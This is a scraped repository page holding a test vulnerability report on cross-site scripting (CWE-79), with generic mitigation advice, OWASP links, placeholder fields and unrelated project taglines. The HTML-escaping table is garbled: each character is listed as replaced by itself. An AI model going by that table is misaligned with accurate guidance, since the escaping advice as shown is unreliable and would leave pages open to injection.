test
reginato / new_project_test Goto Github PK
View Code? Open in Web Editor NEWtest
test
ID: REG_00003.002
Categoria: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Reportado por: Rodrigo Reginato
Projeto: reginato/new_project_test
Criticidade:
Impacto: Alto
Probabilidade: Alto
Criticidade: Crítico
Padrões: [2013] A3 – Cross-Site Scripting (XSS), CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Descrição: The vulnerability of Cross-Site Scripting (XSS) could allow an attacker to get sensitive information from the web application. This flaw could permit the unauthorized access of an attacker. The exploitation of a XSS flaw is made after the injection of malicious code in the scope of application, doing that, the legitimate user executes this malicious code, sending back to the attacker sensitive information like cookies.
Descrição do Impacto: Aguardando preenchimento
Solução: The first step in order to mitigate the problems of XSS is to identify all points of the application where user supplied data is used in the construction of response pages. This identification procedure should include not only the points where data from a particular request are copied directly to the response pages, but must also consider any point where the data supplied by the user is persisted by the application to be shown later, this happens, for example, with the information from the submission of a registration form.
It is recommended that validation that govern the data flow input to be made based on the context of the information being received, for example, numeric fields should receive strictly numeric characters, rejecting any different character set which the application expects. This same procedure should be followed for other form fields according to the information type they wish to accept in the application: names, e-mail, phones, among others. This goal can be achieved using regular expressions to filter out unwanted character sets considered based on the context of the information received.
With respect to the validation that follows the output stream of the application data when the information is actually used to build the answers, you should ensure that potentially malicious characters are replaced as proposed by the escape sequences defined in HTML. A well-defined set of HTML entities should be used to replace literal characters as follows:
char “ replaced by "
char ‘ replaced by '
char & replaced by &
char < replaced by <
char > replaced by >
In order to achieve excellence regarding the creation of filters, it is strongly recommended to adopt coding in HTML for any character not in the set of alphanumeric characters including whitespace (whitespace).
Referência: https://www.owasp.org/index.php/XSS
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)Prevention_Cheat_Sheet
https://www.owasp.org/index.php/Testing_for_Cross_site_scripting
http://projects.webappsec.org/w/page/13246920/Cross%20Site%20Scripting
http://www.youtube.com/watch?v=Z9RQSnf8-g
Tipo de falha:
**Código:**teste
**Entrada de dados:**teste
**Saída de dados:**teste
Defect Tracker: https://app.conviso.com.br/scopes/191/projects/2181
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.